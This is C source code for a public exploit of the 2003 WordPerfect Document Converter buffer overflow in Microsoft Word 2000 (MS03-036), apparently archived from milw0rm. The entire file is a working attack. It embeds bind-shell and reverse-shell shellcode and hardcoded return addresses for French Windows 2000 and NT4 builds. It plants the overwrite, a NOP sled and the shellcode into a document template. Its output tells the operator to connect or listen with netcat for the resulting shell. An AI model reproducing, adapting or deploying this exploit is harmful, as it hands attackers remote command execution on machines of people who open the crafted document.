CVE-2003-0666

1. /******************************************************************/
2. /*   Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036    */
3. /*                                                                                                                */
4. /*                                  Exploit with several targets                                         */
5. /*                                                                                                                */
6. /*        Find your own return address with :                                                       */
7. /*            findhex dllname FF D4 (call esp)                                                      */
8. /*            findhex dllname FF E4 (jmp esp)                                                      */
9. /*                                                                                                                */
10. /* Credits :                                                                                                   */
11. /* vulnerability : Yuji "The Ninja" Ukai                                                              */
12. /* findhex : Jason Jordan                                                                               */
13. /* sk scan-associates.net                                                                               */
14. /* shellcode : metasploit                                                                                */
15. /* exploit : valgasu - RstAck                                                                           */
16. /*                                                                                                                */
17. /******************************************************************/
18.  
19.  
20. #include <stdio.h>
21. #include <stdlib.h>
22. #include <malloc.h>
23. #include <windows.h>
24. #pragma comment(lib,"ws2_32")
25.  
26. /* eip offset for Word 2000 9.0.2812 */
27. #define EIP_OFFSET 1359
28.  
29. /* eip offset for Word 2000 9.0.4462 SR1 */
30. //#define EIP_OFFSET 1343
31.  
32.  
33. void usage(char *name)
34. {
35. printf("\n-- --\n");
36. printf("-- WordPerfect Document Converter Exploit --\n");
37. printf("-- --\n\n");
38. printf("Usage: %s <shell type> <template doc> <os> <port> [<ip>]\n\n", name);
39. printf("Shell type : 1 - Bind shell (need port)\n");
40. printf(" 2 - Reverse shell (need ip and port)\n\n");
41. printf("OS : 1 - Windows 2000 Pro SP3 French\n");
42. printf(" 2 - Windows NT4 Workstation SP5 French\n");
43. printf(" 3 - Windows NT4 Workstation SP6 French\n");
44.  
45. exit(1);
46. }
47.  
48.  
49. int main(int argc, char *argv[])
50. {
51. unsigned char bindshell[] =
52. "\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x89\x06\xff\x36"
53. "\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x08\xff\x36\x68"
54. "\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
55. "\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
56. "\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x00\x00\x89\x46"
57. "\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x00\x89\x46\x14"
58. "\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x00\x89\x46\x18"
59. "\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x00\x89\x46\x1c"
60. "\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x00\x89\x46\x20"
61. "\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x00\x89\x46\x24"
62. "\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x00\x89\x46\x28"
63. "\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x00\x89\x46\x2c"
64. "\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56"
65. "\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x57\x57"
66. "\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x51\x53\xff\x56"
67. "\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x89\xc2\x68\x65"
68. "\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\xc4\xac\xff\xff"
69. "\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\xe2\xfd\xc6\x44"
70. "\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x54\x24\x4c\x89"
71. "\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
72. "\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\xff\xff\xff\xff"
73. "\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x00\x00\x8b\x40"
74. "\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57"
75. "\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
76. "\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
77. "\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
78. "\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
79. "\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
80. "\x5b\xc2\x04\x00";
81.  
82. char revshell[] =
83. "\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x89\x06\xff\x36"
84. "\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x08\xff\x36\x68"
85. "\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
86. "\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
87. "\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x00\x00\x89\x46"
88. "\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x00\x89\x46\x14"
89. "\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x00\x89\x46\x18"
90. "\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x00\x89\x46\x1c"
91. "\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x00\x89\x46\x20"
92. "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
93. "\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\xeb\x03\xff\x56"
94. "\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51"
95. "\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x00\x89\x66\x30"
96. "\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xe9\xeb"
97. "\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x5c\x24\x48"
98. "\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51"
99. "\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff"
100. "\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x56\x64\xa1\x30"
101. "\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04"
102. "\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78"
103. "\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b"
104. "\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01"
105. "\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b"
106. "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0"
107. "\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";
108.  
109.  
110. FILE *docfile;
111. unsigned short port;
112. const char *eip;
113. char targetos[255];
114. int i;
115. int bshell;
116.  
117.  
118. if (argc <5) {
119. usage(argv[0]);
120. }
121.  
122. printf("\n-- --\n");
123. printf("-- WordPerfect Document Converter Exploit --\n");
124. printf("-- --\n\n");
125.  
126.  
127. /* Shell type */
128. switch(atoi(argv[1])) {
129. case 1 : printf("-- Shell type : bind shell\n");
130. bshell = 1;
131. break;
132.  
133. case 2 : printf("-- Shell type : reverse shell\n");
134. bshell = 0;
135. break;
136.  
137. default : printf("-- Shell type : unknown\n");
138. exit(1);
139. }
140.  
141.  
142. /* Open template file */
143. if( (docfile = fopen(argv[2], "r+b")) == NULL) {
144. printf("-- Can't open file %s\n", argv[2]);
145.  
146. exit(1);
147. }
148. else {
149. printf("-- Template file : \"%s\"\n", argv[2]);
150. }
151.  
152.  
153. /* Customize shellcode */
154. port = htons(atoi(argv[4]));
155.  
156. if(bshell) {
157. *(unsigned short *)&bindshell[227] = port;
158. printf("-- Port : %d\n", atoi(argv[4]));
159. }
160. else {
161. *(unsigned short *)&revshell[185] = port;
162. printf("-- Port : %d\n", atoi(argv[4]));
163.  
164. *(unsigned int *)&revshell[178] = inet_addr(argv[5]);
165. printf("-- IP : %s\n", argv[5]);
166. }
167.  
168. /* Set the return address */
169. switch(atoi(argv[3])) {
170. // Windows 2000 Pro SP3 - French
171. case 1 : sprintf(targetos, "Windows 2000 Pro SP3 - French");
172. eip = "\xA7\x88\xE2\x77";
173. break;
174.  
175. // Windows NT4 Workstation SP5 - French
176. case 2 : sprintf(targetos, "Windows NT4 Workstation SP5 - French");
177. eip = "\x10\x45\xEB\x77";
178. break;
179.  
180. // Windows NT4 Workstation SP6 - French
181. case 3 : sprintf(targetos, "Windows NT4 Workstation SP6 - French");
182. eip = "\x36\x28\xF3\x77";
183. break;
184.  
185. // Add your own return address here
186.  
187. default : printf("-- Target OS : unknown\n");
188. exit(1);
189. }
190.  
191. printf("-- Target OS : %s\n", targetos);
192.  
193. fseek(docfile, EIP_OFFSET, SEEK_SET);
194. fwrite(eip, sizeof(eip), 1, docfile);
195.  
196. // Put some nop
197. for (i=0;i<24;i++) {
198. fseek(docfile, EIP_OFFSET + 4 + i, SEEK_SET);
199. fwrite("\x90", sizeof(char), 1, docfile);
200. }
201.  
202. // Put our shellcode
203. fseek(docfile, EIP_OFFSET + 28, SEEK_SET);
204.  
205. if(bshell) {
206. fwrite(bindshell, sizeof(bindshell), 1, docfile);
207. }
208. else {
209. fwrite(revshell, sizeof(revshell), 1, docfile);
210. }
211.  
212. fclose(docfile);
213.  
214. printf("-- Status : template file modified\n");
215.  
216. if(bshell) {
217. printf("-- After document execution : nc <ip> %d\n", atoi(argv[4]));
218. }
219. else {
220. printf("-- Before document execution : nc -l -p %d\n", atoi(argv[4]));
221. }
222.  
223. return 0;
224. }
225.  
226.  
227. // milw0rm.com [2003-09-06]
228.